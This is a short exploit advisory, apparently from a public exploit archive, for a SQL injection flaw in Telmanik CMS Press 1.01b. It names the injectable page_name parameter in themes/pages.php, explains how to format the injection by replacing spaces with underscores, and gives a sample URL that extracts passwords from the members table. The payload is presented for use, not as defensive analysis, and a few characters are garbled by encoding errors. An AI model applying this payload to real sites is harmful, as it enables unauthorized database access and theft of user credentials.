26 lines
769 B
Text
Executable file
26 lines
769 B
Text
Executable file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
[x] Type: SQL Injection
|
||
[x] Vendor: www.telmanik.com
|
||
[x] Script Name: Telmanik CMS Press
|
||
[x] Script Version: 1.01b
|
||
[x] Script DL:
|
||
http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
|
||
[x] Author: Anarchy Angel
|
||
[x] Mail : anarchy[at]dc414[dot]org
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
|
||
Exploit:
|
||
|
||
http://site.org/themes/pages.php?page_name=[SQLi]
|
||
|
||
you have to formate you injection like so:
|
||
union_select_row_from_table
|
||
Replacing spaces with <20>_<EFBFBD>.
|
||
|
||
Ex:
|
||
|
||
http://site.org/themes/pages.php?page_name=union_select_password_from_members
|
||
|
||
This is a special DefCon 21 kick off from me! See ya there [image: ;)]
|
||
|
||
Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny
|